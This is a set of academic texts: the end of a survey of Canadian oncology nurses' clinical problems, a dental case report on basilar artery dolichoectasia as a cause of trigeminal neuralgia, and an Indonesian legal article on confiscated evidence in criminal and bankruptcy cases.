The majority of respondents (61%) in the study were in the middle age group of 35 to 49 years.The rank ordered list of this group most closely resembled the list determined for the overall sample and the lists share the same top four choices.As rank orders of clinical topics were determined by total scores, it is likely that the responses of the middle age group contributed proportionately more to the overall ranking of items for the entire study sample.As a result, this nurse subgroup was analyzed separately and rank order lists were determined based on education and workplace for the subgroup of oncology nurses aged 35 to 49 years.Table Four illustrates the rank order of clinical problems according to three education levels for the subgroup of respondents aged 35 to 49 years.In all three education levels, the highest ranked problem was anxiety.Both the diploma and baccalaureate prepared nurse groups included nurse burn-out as a clinical problem, ranking it number 5 and number 8 respectively.In the group of Master's/PhD prepared nurses, outcome measures for interventions received the second highest ranking.As well, for this education subgroup, issues of ethics, patient/physician communication and family/nurse communication appeared on the priority list but were absent from the lists of the diploma and baccalaureate prepared education subgroups.The baccalaureate prepared nurses were the only group to include cost containment as an important clinical problem.
In terms of workplace, respondents aged 35 to 49 years who were employed in either hospital or ambulatory care settings rated anxiety as the number one clinical problem (Table Five).The rank listings of respondents working in both hospital and ambulatory care shared further similarities and included the topics of coping-stress management, bereavement/death and nurse burn-out in their top seven rankings.In contrast, similarly aged respondents employed in community settings ranked outcome measures for interventions as the most important clinical problem.This community group also included patient decision-making, cancer in the elderly and patient education in their top 10 clinical problems.
Patterns of important clinical problems
Exploratory principal component analysis was employed to look for patterns of perceived important clinical problems.This technique was selected because of the many past demonstrations of its usefulness for revealing patterns among variables or items (Ferketich & Muller, 1990;Norman & Streiner, 1994).The technique explores the relationship among items and identifies the degree to which items correlate with a smaller number of underlying components.For the purpose of this study, principal component analysis was used to identify groupings of items that correlate strongly with each other according to the sample of oncology nurses' responses on the rating scale.
Prior to conducting the principal component analysis, the entire data set was reviewed for the purpose of eliminating items consistently not considered to be a problem by the respondents.In doing this, the original 80 items listed in the questionnaire were resorted and all items reported as "not a problem" or "do not know" were eliminated.The reduced "clinical problem data set" contained 41 items that were consistently reported as a problem within the categories of "sometimes", "often" or "always".The final data set of 41 items with the sample of 249 met the criteria of having a minimum of five cases per item and at least 100 subjects, making it suitable for principal component analysis (Norman & Streiner, 1994).
The analysis initially extracted 11 components with eigenvalues greater than one.Using the criterion of Cattell's Scree Test, the first five components were retained.These five components explained 42% of the variance in the data set and each component explained at least 4% of the variance (Table Six).
Table Seven shows the five components and lists the items that significantly loaded on each component.In total, 24 of the 41 items in the dataset had loadings greater than 0.4 on one of these five components.
In naming each of the five components, the investigators examined the conceptual fit between the items in each component and selected
Discussion
This survey investigation was undertaken to identify the problem issues oncology nurses experience in their daily clinical practice.The clinical setting for cancer care delivery is undergoing rapid change and oncology nurses cannot help but be influenced by these changes.Identification of the clinical issues which are consistently experienced as problems was anticipated to have implications for action by practitioners, researchers, educators and administrators.This is the first Canadian study to explore this issue using a comprehensive topic list and requesting ratings which necessitated comparing and contrasting one's practice experience regarding different topic areas.
The tool developed for this study had some limitations.It was comprehensive in listing topic areas and allowed participants to add topics they thought were omitted.However, the tool did not include definitions or descriptions of each item topic and participants may not have had entirely the same ideas about a particular topic when they rated it on the survey.The instrument also did not allow the participants the opportunity to indicate why a particular topic was perceived as a problem.Further investigation is required to fully understand the underlying reasons any one topic area is considered a problem.The rating, however, provides an overall perspective on the types of clinical issues oncology nurses are currently confronting in their daily practice.
The present study sample included proportionally more nurses in the middle age group (35 to 49 years of age) in comparison to registered nurses in Canada (Statistics Canada, 1993) and fewer nurses in the younger age group (less than 35 years).No similar Canadian statistics are currently available describing subgroups of nurses involved in specialty care with regards to age, education or workplace.Therefore it is not known whether the study sample accurately represents the age profile of oncology nurses in Canada.Due to the expertise in knowledge and skill required in oncology nursing and its recognition as a specialty field, it may be likely that an employment requirement includes nursing experience.Thus, this may be reflected in the over-representation of nurses in the middle age group.However, recent lay-offs of younger nursing staff in many clinical settings may also be a contributing factor.
The study sample represents a group of nurses who have considerable clinical experience.Thus, the participants are familiar with cancer care and have the ability to identify important clinical issues.As with all survey studies, respondents likely reflect the views of oncology nurses who have an interest in this topic and may not represent the views of all oncology nurses.
The top clinical problems are clearly within the scope of oncology nursing practice (Table Two).Nine are patient-oriented with five focusing on psychosocial problems and four on biophysiological problems.Only one top problem reflects concerns about the individual nurse.The problems cross the range of potential types of clinical problems.These results were very similar to the one other study in Canada which examined nurse perceptions of difficult patient problems (Bramwell, 1989).
Although it is not clear from these data why particular problems surface in this top 10 list, one could argue that the nine patientoriented problems are all complex clinical topics involving both physical and psychosocial dimensions.All require indepth assessment to fully understand the patient's experience and the interplay between the physical and psychosocial dimensions, as well as to select or tailor interventions for the particular individual.The ranking may reflect the frequency with which the clinical phenomenon is observed in cancer patients coupled with an inability on the part of the nurse to respond appropriately.This inability to respond may be a function of lack of time to perform the assessment and tailor the intervention, a lack of knowledge about the proper intervention, or the application of interventions which are not successful.Lack of knowledge about a particular clinical problem may arise either from not being aware of existing knowledge or because the knowledge itself is not yet available.The latter case is a call for intervention research while the former is a call for educational activity.However, lack of time may well be a reality in light of busy clinical practices and heavy workloads.Such an issue has implications for administrators regarding resource availability and expectations for quality care.
That nursing burn-out was identified as one of the top 10 clinical issues may reflect the number of participants who are front-line providers.This study was undertaken at a time when hospital restructuring had started in Canada.Nursing positions had been reduced and workloads had increased.Feeling a dissonance between what a nurse believes ought to be done for patients and what can be done realistically can be a contributing factor to the identification of nurse burn-out (Bram & Katz, 1989).Particularly for oncology nurses, distress emerges when issues such as poor staffing, excessive use of registry staff, and unexpected crises interfere with their ability to care for patients (Cohen & Sarter, 1992).
Exploring the variations in ranking by age provided interesting observations.The variation in ranking by age group revealed the younger group (<35 years) as the only group to identify communication between patient and physician as a top issue.The majority of the nurses in the younger group worked in a hospital setting.Clearly, inpatient and outpatient settings have different challenges with regards to physicianpatient communication.Perhaps in the inpatient setting nurses had the opportunity to observe patient-physician interaction on a regular basis and hear patient frustration about that interaction.Other possible explanations for this rating include the possibilities that these nurses may have been more sensitized to communication issues in their educational programs or they are still developing skills in dealing with this type of clinical issue.
In contrast to the young age group, issues of quality of life surfaced in the middle and mature groups along with higher ratings regarding metastatic disease and recurrent disease.This is in keeping with data revealed in a recent study of oncology nurses' perspectives on quality of life (Fitch, 1998).Many of the experienced nurses in Fitch's study described how experiences within their personal lives and within their practice during their careers culminated in a shift of perspective about the importance of quality of life issues.The shift often resulted in an increased sensitivity to quality of life issues and an emphasis on helping patients achieve their wishes regarding quality of life.
Exploring the influence of education and workplace on the rankings of the top 10 clinical problems was completed for the middle age group because of the undue influence of that group on the overall ratings.It is interesting that in the analysis by workplace, community nurses did not identify care in the home as an issue.Topics such as family issues and home care were included in the list of choices on the survey.The community group was rather small (n=19) and included nurses who worked in education/academic positions (n=13).This is a function of the mailing list as well in that relatively few communitybased nurses were in the original CANO membership list.Hence, the views of front-line community nurses were not prevalent in the rankings.The ranking may reflect the academic or research interests of the individuals in the group and may, in turn, be a function of funding support for research or programs of study.Further work is needed to identify the perspectives of front-line community nurses regarding pressing clinical problems across Canada.
The variation in rankings by education may reflect workplace influences as well.The diploma and baccalaureate groups identified burn-out as an issue, but these groups also had the highest composition of front-line nursing staff working in institutional settings.Front-line staff in hospital settings may be at greater risk for burn-out than nurses working in other types of positions (Bram & Katz, 1989).In the Masters/PhD group, issues identified are likely a reflection of educational preparation.For example, this group identified outcome measures of intervention as a clinical priority, which could be a reflection of the exposure to research in graduate school or their current role.
Principal component analysis
This is the first Canadian study to utilize a principal component analysis to look for patterns in important clinical issues.The principal component analysis was valuable in providing a "big picture" of oncology nurses' perspectives.The analysis relates to the scoring of items and how they relate together.In essence, groups of items are scored in relation to one another the same way.This could reflect a perception of the items as belonging to a broader underlying construct, theme, or clinical problem.For example, the factor of comprehensive cancer care includes a number of issues that are required or should be considered when providing overall cancer care to patients.
All five factors represent topics that are found in the top third of the overall rank order list of 80 items.Therefore, the factors can be considered representing patterns of "important" clinical problems as identified by practising oncology nurses.For example, "anxiety" is part of a construct/theme called "experience of loss" and is related to other items such as bereavement/death which also were ranked in the upper third of the overall listings.
The issue of communication surfaced in the principal component analysis as an underlying theme, but did not always surface as a top priority in the nurses' lists.This may be because the topic of communication was not presented as one topic in the original list of topics (issues), but rather as four individual items (e.g., communication nurse/patient, communication patient/physician).This may have diluted the emphasis or importance the sample placed on this topic as a whole.
While the variance explained by the first five components is low (42%), some patterns did emerge that explained variability in the data.However, most of the variation remained unexplained.Further research might help to identify factors that explain the patterns in importance of clinical problems.Future analysis needs to be completed individually for different clinical settings.
Nursing implications
The five factors cover significant aspects of clinical oncology nursing.Our data suggest these are areas where oncology nurses in this sample are experiencing problems on a regular basis.Given these findings, there are implications for action.
The data from this study could serve as a springboard for discussion with staff nurses.They could be presented at a unit or departmental level.The discussion could focus on whether the particular staff group share the perspectives expressed in this work and, if so, what they believe are the underlying factors contributing to those perspectives.Once the underlying factors are identified, direction for action may be clear.In addition, it will be important to help staff identify the factors over which they have some control and to focus change strategies in those areas.
Further research may well be indicated in certain areas (i.e.fatigue, anxiety, communication), not only in general terms but also concerning "brief" interventions which can be effectively provided in a busy clinical environment.Additionally, there may be indications for educational interventions for staff focused on assessment and appropriate referral for counselling, support and community programs.
Direction may also exist for strengthening the focus on researchbased practice and making use of existing knowledge.For example, it is clear that knowledge exists regarding pain management.However, it would seem that knowledge may not be reaching front-line staff or our clinical settings have practices that interfere with the use of the existing information on a daily basis (Howell, Fitch & Rechner, in review).This may also be true for other topic areas.
Finally, there may also be indication for strengthening the advocacy role of oncology nurses.At times clinical problems exist but appropriate services are not available.This is frequently the case with supportive care services (Fitch, 1997).Developing explicit standards of practice for supportive care interventions and engaging strong advocacy for appropriate levels of service have been identified as necessary actions if we are to see an improvement in cancer care.Oncology nurses are in excellent positions to advocate for appropriate levels of patient-centered services.
Table Six : Eigenvalues and variance explained for the first five extracted principal components.
The five components explained 42% of the total variance in the problem items dataset.
Table Seven : Varimax rotated factor matrix and loadings of the first five principal components.
All items are ranked according to their loadings from highest-lowest, including (loading value), and each item has a loading in excess of 0.4. | 2018-04-03T04:20:55.857Z | 1999-01-01T00:00:00.000 | {
"year": 1999,
"sha1": "52dfcce49f30c468e71266c28ff77b74505ac2bc",
"oa_license": "CCBYNC",
"oa_url": "http://canadianoncologynursingjournal.com/index.php/conj/article/download/449/450",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "52dfcce49f30c468e71266c28ff77b74505ac2bc",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
234369087 | pes2o/s2orc | v3-fos-license | Basilar artery dolichoectasia an unusual and rare cause of secondary trigeminal neuralgia: a clinical report
Objective: Patients with Trigeminal Neuralgia often consults a dentist for relief of their symptoms as the pain seems to be arising from teeth and allied oral structures. Basilar artery Dolichoectasia is an unusual and very rare cause of secondary Trigeminal Neuralgia as it compresses the Trigeminal nerve Root Entry Zone. Case reports: We report three cases of Trigeminal Neuralgia caused by Basilar artery Dolichoectasia compression. The corneal reflex was found absent in all three of the cases along with mild neurological deficits in one case. Multiplanar T1/T2W images through the brain disclosed an aberrant, cirsoid (S-shaped) and torturous Dolichoectasia of basilar artery offending the Trigeminal nerve Root Entry Zone. Discussion: Based on these findings we propose a protocol for general dentist for diagnosis of patients with trigeminal neuralgia and timely exclusion of secondary intracranial causes. Conclusion: General dentists and oral surgeons ought to consider this diagnosis in patients presenting with chronic facial pain especially pain mimicking neuralgia with loss of corneal reflex or other neurosensory deficit on the face along with nighttime pain episodes. Timely and accurate diagnosis and prompt referral to a concerned specialist can have an enormous impact on patient survival rate in such cases. RESUMO
C A S E R E P O R T
Basilar artery dolichoectasia an unusual and rare cause of secondary trigeminal neuralgia: a clinical report INTRODUCTION T rigeminal neuralgia (TN) an episodic, electric-shock like pain in one or more branches of the fifth cranial nerve, is one of the most agonizing clinical entity that devastates the Quality of Life (QOL) of the patients, incapacitating their ability to speak, eat, drink, touch or wash the face and tooth brushing [1][2][3]. Reduced measures of daily functioning, quality of life, well-being, sleep, mood, and overall health status are directly associated with TN pain severity which affects employment in 34% of patients [4].
The TN pain makes a patient to seek a dentist for management as it seems to be arising from teeth or oral structures [5]. It has been reported that 90% of the patient with TN like symptoms experienced pain for more than 1 year before receiving an accurate diagnosis, whereas 13% went 10 years without a diagnosis [2]. Misdiagnosis might lead to unnecessary procedures and can delay definitive treatment as it has been reported that about 33% to 65% of patients with trigeminal neuralgia (TN) appearing to their dentist initially undergoes unnecessary dental treatments [1,2], [5,6].
Idiopathic trigeminal neuralgia is usually caused by intracranial neurovascular conflict and in 98% cases, the superior cerebellar artery (SCA) is the cause of compression at the trigeminal nerve root entry zone (TREZ) [1]. Basilar artery Dolichoectasia is an unusual and very rare cause of TN and is represented by a very small number of cases in literature [7][8][9][10]. We are reporting three cases of TN caused by Basilar artery Dolichoectasia.
Case No 1
A 20-year-old male complained of electric shock-like pain in the prominence of the cheek for the last three years. He initially presented to a general dentist for management two years ago, mistaking it for toothache. Following a few unsuccessful dental procedures to relieve his pain, the patient was referred to an oral surgeon who performed neurectomy of the infra-orbital nerve to treat TN. The pain recurred after one year. The patient presented six months after the recurrence. He was on Carbamazepine 200mg but admitted to being irregular in taking his medication as it did not provide any relief in his painful symptoms and made him very drowsy the whole day instead. On review of history, the patient complained of electric shock-like pain on the right side of the upper face with more than 10 painful episodes per day that would sometimes awaken the patient from sleep. On clinical examination and neurosensory testing, the corneal reflex was found absent. A magnetic resonance imaging (MRI) brain scan was advised that revealed an aberrant and torturous basilar artery in close contact at pons near the TREZ ( Figure 1A). Based on the finding of MRI the patient was promptly referred to the neurosurgery department for vascular decompression. The patient successfully underwent decompression of the trigeminal nerve and remained pain-free up till two years of follow-up.
Case No 2
A 45-year-old male presented with severe stabbing pain on the right side of the face for the last five years. He had been to multiple general dentists for management of his pain and underwent many unsuccessful procedures including extractions and endodontic treatment. He had consulted a few oral surgeons who performed neurectomies that provided him with some temporary relief in pain. Currently, the patient was on carbamazepine 200mg and gabapentin 300mg without much relief. The pain episodes would awaken the patient from sleep and tormented him 15 to 20 times a day. Clinical examination revealed a mild neurosensory deficit on the face on the affected side along with the absence of corneal reflex. On MRI brain scan a note was made of a large Cirsoid (S-Shaped) basilar artery in the right cerebellopontine angle indenting the brainstem near the TREZ ( Figure 1B). The patient was subsequently referred to the neurosurgery department for vascular decompression of the trigeminal nerve. Following Braz Dent Sci 2021 Jan/Mar;24 (1) 3 the neurosurgical intervention, the patient had recovered all neurological functions and had no complaints of any pain or discomfort in the distribution of the trigeminal nerve for two years.
Case No 3
A 40-year-old female presented with lancinating pain in the right upper jaw for the last 4 years. She had consulted a general dentist for management of her symptoms who after performing a few unsuccessful dental procedures referred her to an oral surgeon. She had undergone a neurectomy for relief of pain but only to suffer recurrence after about 6 months. The patient was on carbamazepine 200 mg. On clinical examination, there was a mild neurosensory deficit in the infra-orbital region along with the weakness of the corneal reflex. Multiplanar imaging was done through brain acquiring T1/T2W images disclosing an aberrant dilated and elongated basilar artery offending the TREZ ( Figure 1C) The patient was referred to the neurosurgery department for further management. Decompression of the trigeminal nerve was performed by the neurosurgeons. She was followed up for two years after her decompression and remained free from her trigeminal neuralgia.
DISCUSSION
The basilar artery (BA) is formed by the unification of the two vertebral arteries (VAs) and extends on the basilar sulcus of the pons, from the bulbopontine sulcus to the interpeduncular or suprasellar cistern separating into the posterior cerebral arteries (PCAs), measuring approximately about 30 mm in length and 1.5 to 4 mm in width; an extension beyond these values indicates the presence of so-called "Dolichoectasia" a term derived from the Greek words: dolichos, meaning elongation, and ectasia, meaning dilatation of the BA11. It is a very rare cause of trigeminal neuralgia and is observed in approximately 2.8 to 7.7% of patients with vascular compression [7][8][9][10], [12]. Magnetic resonance imaging in our patient showed that the basilar artery was elongated as far as the cerebellopontine angle. According to Smoker et al, this is the most severe elongation of the basilar artery [13].
First detected by Dandy in 1934 as a cause of TN compressing the TREZ who used the term "cirsoid (S-shaped) aneurysms", emphasizing the elongation, tortuosity, and dilation of the artery with dense walls, in order to specify characteristic changes in the shape and dimensions of the vessel [14]. Later in 1945, he encountered 11 similar cases in 108 patients under-going posterior fossa exploration for treatment of trigeminal neuralgia [15]. One of our cases can be described as Cirsoid (S-shaped) as shown in Figure 1B.
Sunderland in 1948 reported two cases where the BA was elongated and was found to impress the trigeminal nerve out of 210 autopsies [16]. We found three cases of BA dolichoectasia in live patient and diagnosis was made by MRI brain scan.
Richard H Lye in 1986 presented of four patients, investigation of whom demonstrated the presence of an ectatic BA [7]. All the four case presented by Lye were aged above 50 years with one being as old as 82 years and two with histories of mild hypertension unlike our cases who were all below the age of 50 years with one presenting at an age of 20 years. All three of our cases were non-hypertensive but there was a consistent loss of corneal reflex in all of them.
The exact etiology of this condition is not completely understood; numerous potential origin hypothesis have been suggested including Hypertension-induced atherosclerosis, Congenital Braz Dent Sci 2021 Jan/Mar;24(1) 4 factors due to its reported association with various conditions like autosomal recessive polycystic kidney disease (ARPKD), Pompe disease, Fabry disease due to a novel mutation in the α-galactosidase A (GLA) gene, sickle cell anemia, Marfan syndrome, Ehlers-Danlos syndrome, PHACES syndrome, Infectious diseases, including syphilis infection, varicella-zoster virus infection, Abnormal matrix metalloproteinase (MMP) expression associated with intracranial arterial dilation. The wide array of cases reported in literature suggest that the condition may be due to the combined effect of congenital and acquired factors [17]. This may explain the presentation of TN symptoms at a younger age.
This condition may present with widely variable clinical manifestations, with most common symptom being ischemic stroke, brainstem and cranial nerve compression, hydrocephalus, and cerebral hemorrhage. Thus the clinical features may be distributed under these four groups. The development of brainstem compression by VBD is usually slow considering its gradually progressive nature, with possible early detection of minor nerve damage having important clinical implication most commonly extended blink reflex latency and altered motor evoked potentials in limbs [18].
Practically any and all cranial nerve impairment symptoms can be associated, including most common compression of the trigeminal nerve root and facial nerve root presenting as trigeminal neuralgia, hemiface spasm respectively. Compression of abducens nerve, trochlear nerve, and oculomotor nerve has been reported in literature. Other symptoms such as nystagmus, tinnitus, hoarseness, and difficulty swallowing, dysarthria, ataxia, unilateral hemiparesis are significant to mention as they could raise the suspicion of presence of this pathology to the dental practitioners [17].
Noma and Kobayashi in 2009 reported three cases of TN due to vertebrobasilar dolichoectasia (VBD) presenting at their dental clinic and discussed the dental clinician's role in such cases emphasized that dentist must be aware of this particular cause of TN [19]. This fact can never be overemphasized as all three of our patients experienced pain for three, four and five years before receiving an accurate diagnosis and subsequent management for their symptoms.
The survival rate in VBD after 3 years follow-up was found to be 60% in a small case series by Ubogu and Zaidat [20]. Passero and Rossi in 2008 reported a relatively higher death rate following diagnosis of VBD as a natural history of the disease shows that such patients may experience a cerebrovascular event with high incidence after the initial diagnosis [21]. The cerebrovascular accident is significantly related to VBD severity, poor control of hypertension and the use of antiplatelet or anticoagulant drugs leading to increase the risk of hemorrhage [22]. This information is extremely crucial in-patient outcome with TN due to VBD as a potential tendency of clinicians to overvalue facial pain instead of dolichoectasia and its potential complication [23]. Timely and accurate diagnosis by the general dentist and /or the oral surgeon and prompt referral to a concerned specialist can have an enormous impact on patient survival rate in such cases.
Based on these findings we propose the following protocol for general dentist for diagnosis of patients with trigeminal neuralgia and timely exclusion of secondary intracranial causes of pain 1. All patients presenting with chronic electric shock like unilateral facial pain must have detailed neurological examination to exclude any area of numbness on the face in the distribution of trigeminal nerve branches.
2. Since most of the patients with chronic TN like pain already have history of multiple surgical procedures including TN nerve branches neurectomy and alcohol injections and may present with pre-existing paresthesia of the face camouflaging actual neurological disturbance caused by any intra-cranial lesions, it is recommended to focus on the presence or absence of Corneal reflex in these cases.
3. Any patient with history of TN like pain commencing before 40 years age, occurring at night especially during sleep, and with absence of corneal reflex must undergo an MRI brain scan to exclude any intracranial lesion or anomaly in the TN nerve root entry zone and be referred promptly to concerned specialist for further management.
CONCLUSION
These three cases are an addition to the very few reported cases of TN due to VBD. General dentists and oral surgeons ought to consider this diagnosis in patients of TN presenting with loss of corneal reflex or other neurosensory deficit on the face along nighttime pain episodes. All patients presenting with TN like symptoms must undergo mandatory MRI brain scans to avoid delayed or erroneous diagnosis and unsuitable treatment interventions by their general dentists and oral surgeons. | 2020-12-24T09:07:44.744Z | 2020-12-22T00:00:00.000 | {
"year": 2020,
"sha1": "08a9e73516325a5fa0dfbc025baee0ea1b98c1ec",
"oa_license": "CCBY",
"oa_url": "https://bds.ict.unesp.br/index.php/cob/article/download/2273/4246",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "e932e1ba707711e61fe71fecbba54023baf0325f",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
266296692 | pes2o/s2orc | v3-fos-license | IMPLEMENTATION OF A JUDGE'S DECISION REGARDING THE EVIDENCE STATUS IN CRIMINAL CASES RELATED TO BANKRUPTCY CONFISCATION
This article discusses criminal acts with the characteristics of a large number of victims and losses, one of which is the case of PT First Travel and Abu Tour with the same motive and article being charged. For the purposes of examining criminal cases since the preliminary examination stage, the process of confiscating evidence has been carried out, including goods which are the object of a crime, proceeds of a crime and other goods related to a crime, including goods in bankruptcy confiscation. The issues discussed are the application of the status of evidence in criminal cases related to bankruptcy confiscated goods in a judge's decision and efforts to return evidence in meeting the victim's loss due to a crime. Using the normative juridical research method, it was concluded that the consideration of judges, which is one of the most important aspects in determining the realization of the value of a judge's decision, was not carried out carefully and thoroughly, one of which was in decisions 3096 K/Pid.Sus/2018 and 3127 K/PID.SUS/2019 which makes no sense at all. Efforts are needed to return the confiscated evidence from the victim to overcome the losses suffered, in several ways, namely improving the search and filing administration system for evidence subject to confiscation from the investigation stage so that the case files at the prosecutor's office are included if there is already a bankruptcy confiscation.
INTRODUCTION
In examining criminal cases, from the investigation stage to the trial, the presence of evidence plays a crucial role.Evidence can shed light on the occurrence of a criminal act and ultimately be used to prove the defendant's guilt, supporting the judge's conviction, as alleged by the Public Prosecutor.
This evidence includes objects related to the criminal act, the outcomes of the criminal act, and other items connected to the criminal act.To maintain security and integrity, particularly when intended for use as evidence in court proceedings, confiscation is conducted. 1garding the evidence used for the purpose of proving, investigators have the authority to carry out confiscation, as regulated in Article 1 number 16 of Law No. 8 of 1981 on Criminal Procedure Law (hereinafter referred to as "KUHAP"), which states: "Confiscation is a series of actions by the investigator to take over and/or retain movable or immovable objects, tangible or intangible, for the purpose of evidence in the investigation, prosecution, and court proceedings.Confiscation can only be carried out by investigators based on the permission of the Chief of the District Court." 2 In accordance with the formulation of Article 1 number 16 of KUHAP, confiscation is the act of taking over items to be stored or retained under the control of the investigator.The evidence subjected to confiscation subsequently becomes confiscated items.Article 39 of KUHAP specifies what can be subjected to confiscation: a Faculty of Law Universitas Padjadjaran, Jl.Dipati Ukur No. 35 Bandung, Indonesia, 40132, email: elis@unpad.ac.id. 1 Yahya Harahap, Pembahasan Permasalahan dan Penerapan KUHAP; Penyidikan dan Penuntutan, Sinar Grafika, Jakarta: 2014, p. 265. 2 See Article 38 paragraph (1) and (2) KUHAP.
1. Items or claims belonging to a suspect or defendant that are wholly or partially suspected to have been obtained from criminal activities or as a result of criminal activities (Article 1 paragraph a).
2. Items that have been directly used in the commission of a criminal act or in preparation for a criminal act (Article 1 paragraph b).
3. Items used to obstruct the investigation of criminal activities (Article 1 paragraph c).
4. Items specially made or intended for the commission of a criminal act (Article 1 paragraph d).
5. Other items directly related to the criminal act in question (Article 1 paragraph e).
6. Items in the possession of the civil litigation or bankruptcy proceedings can also be confiscated for the purposes of investigation, prosecution, and adjudication of criminal cases, as long as they meet the provisions of Article 1 and Article 2 of KUHAP.
In cases involving economic crimes such as fraud, embezzlement, and money laundering, three key components come into play: the perpetrator, the criminal act itself, and the proceeds of the crime (proceeds of crime).The proceeds of the crime can take the form of money or wealth in other forms, such as real estate, jewelry, commercial papers, and so forth.These proceeds of the crime are then used as evidence and subjected to confiscation as state-seized property.
Regarding the evidence used as state-seized property, in some cases of criminal acts that have occurred in the past 5 years, an interesting issue has arisen and become a subject of debate.This is because in the confiscation carried out by investigators, there are also items or objects that are part of civil litigation or bankruptcy cases.This is made possible because Article 39, paragraph 2 of KUHAP states that items in the possession of civil litigation or bankruptcy proceedings can also be confiscated for the purposes of investigation, prosecution, and adjudication of criminal cases, as long as they meet the provisions of paragraph 1.
Law Number 37 of 2004 regarding Bankruptcy and Postponement of Debt Payment Obligations (hereinafter referred to as "Bankruptcy Law"), Article 1, number 1, defines bankruptcy as the public seizure of all the assets of the bankrupt debtor, the management and settlement of which are carried out by a curator under the supervision of a supervising judge, as regulated in this law.The public seizure referred to is the confiscation of the entire assets of the debtor for the purpose of settling all the debtor's debts as mentioned in Article 1131 and Article 1132 of the Civil Code (hereinafter referred to as "KUH Perdata").
Article 1131 and 1132 of KUHPerdata aim to prevent individual seizures or executions and the attempt by creditors to outdo one another.Creditors, consisting of two or more individuals, must act collectively (concursus creditorum)3 to obtain their rights because creditors have an equal claim to all of the debtor's assets (paritas creditorium). 4The wealth must be distributed fairly and Implementation of a Judge's Decision Regarding the Evidence Status in Criminal Cases Related ... proportionally among the creditors, unless there is a compelling reason to prioritize one over the others (pari passu prorate parte).
From the formulation, it can be understood that bankruptcy means the general confiscation of the debtor's assets.This confiscation aims to ensure that all creditors receive equitable payments from the management of the seized assets. 5The certainty in the implementation of the general confiscation is regulated in Article 31, paragraph (2) of the Bankruptcy Law, which states: "The declaration of bankruptcy has the effect that all court execution orders against any part of the Debtor's assets that were initiated before bankruptcy must be stopped immediately, and from that moment on, no order can be executed, including detaining the debtor.All confiscations that have been carried out become void, and if necessary, the supervising judge must order their cancellation."Therefore, when a judge has declared a debtor bankrupt, the general confiscation of the debtor's entire wealth takes effect.The consequence is that all previous confiscations become void and transition into the general bankruptcy confiscation to expedite the resolution of the interests of the bankrupt estate and the rights of the creditors by the trustee.However, suppose the assets of the bankrupt estate are related to a criminal case and have been confiscated by investigators.In that case, it raises the question of whether general bankruptcy confiscation and asset management can still be carried out.
The position of confiscation or seizure in criminal cases and general confiscation in bankruptcy has been a subject of debate among legal experts.The debated aspects include: First, public law aspect.In this context, criminal and tax law experts adhere to the public interest represented by criminal and tax laws.On the other hand, civil and bankruptcy law experts also consider bankruptcy cases as public matters involving the common interest, especially when they involve numerous creditors, as seen in cases like First Travel (63,000 creditors) 6 and Abu Tour (1,822 creditors) 7 Second, justice aspect.Civil law experts argue that general confiscation should be prioritized because, from a justice perspective, it ensures the fulfillment of creditors' rights and prevents rights violations. 8In criminal law, the justice aspect implies that the guilty should be punished, and to achieve this, supporting evidence, including confiscated items, is crucial.Third, utility.According to civil law experts, prioritizing general confiscation would result in the swift and fair resolution of debt matters, without disrupting the economy, both on a small and large 5 Sentosa Sembiring, Hukum Dagang, Citra Aditya Bakti, Bandung: 2015, p. 246. 6 Siti Hapsah Isfardiyana, "Sita Umum Kepailitan Mendahului Sita Pidana dalam Pemberesan Harta Pailit", Padjadjaran Jurnal Ilmu Hukum, Vol. 3, No. 3, 2016, p. 644-645. 7 Himawan, 9 Mei 2018, "Nilai Tagihan Kreditur PKPU Abu Tours Capai Rp 1 Triliun, "http://news.rakyatku.com/read/100477/2018/05/09/nilai-tagihan-krediturpkpu-abu-tours-capai-rp1-triliun", accessed on 11 February 2020. 8Siti Hapsah Isfardiyana, Op.Cit., p. 648.scale.Conversely, if other forms of confiscation, such as criminal confiscation, take precedence, it ensures the security of assets, and the confiscated items can serve as evidence. 9 Fourth, determination and decision aspect.Civil law experts assert that general confiscation should take precedence because it constitutes a judicial judgment, whereas confiscation is considered merely a determination.In civil procedural law, a judgment and a determination are two distinct entities.A judgment is a pronouncement made by the judge during a court hearing, while a determination is a decision by the court regarding voluntary petitions.According to Hadi Shubhan, a court judgment can only be annulled by another court judgment. 10w enforcement in criminal cases, where there is an intersection between criminal confiscation and bankruptcy confiscation, as elaborated above, has seen numerous cases in Indonesia.However, to focus on the matter at hand, we will discuss the cases of fundraising from the public for financing Umrah pilgrimages, namely, PT First Travel and PT Abu Tour (Amanah Bersama Umat).The case examination and analysis will center on how the judge's decision regarding the status of confiscated evidence in criminal cases affects the return of these items to the rightful owners. 11 To understand the role of the judge's decision in determining the status of confiscated evidence and identifying the most rightful claimant of the seized property, an analysis will be conducted in the Provisions regarding "evidence", although stipulated in the aforementioned articles, do not explicitly specify the status of a piece of evidence.In contrast, in the Common Law system, such as in the United States, evidence is categorized differently.In the American Criminal Procedure Law, what is referred to as "forms of evidence" includes real evidence, documentary evidence, testimonial evidence, and judicial notice.In the Common Law system, real evidence (evidence in the form of tangible objects) holds the highest value as a form of evidence.However, it should be noted that in the Indonesian criminal procedure, evidence, including real evidence, is not categorized as such. 13sed on the description above, it can be understood that evidence does not fall under the classification of types of evidence.Article 183 of the Indonesian Criminal Procedure Code (KUHAP) stipulates that to establish criminal liability of a defendant, their guilt must be proven by at least two pieces of valid evidence.Through the establishment of guilt with at least two pieces of valid evidence, the judge acquires the conviction that the criminal act indeed occurred, and the defendant is the one who committed it.
As previously explained in earlier sections, concerning the status of evidence, although it may not be formally classified as a valid type of evidence, it serves the purpose of reinforcing valid evidence in legal practice or court proceedings.This demonstrates the connection between physical evidence and valid evidence.According to Article 181 of the Indonesian Criminal Procedure Code (KUHAP), it is evident that in the criminal process, the presence of physical evidence in a court hearing is of utmost importance for the judge to seek and establish the material truth in the case under consideration.Below, two court decisions that are the subjects of this research will be described: c.As evidenced during the trial, these pieces of evidence were the proceeds of crimes committed by the Defendants and were seized from the Defendants, who were proven to have committed not only the crime of "Fraud" but also the crime of "Money Laundering".Therefore, based on the provisions of Article 39 of the Criminal Code ("KUHP") in conjunction with Article 46 of the Criminal Procedure Code (KUHAP), these pieces of evidence were confiscated for the state.
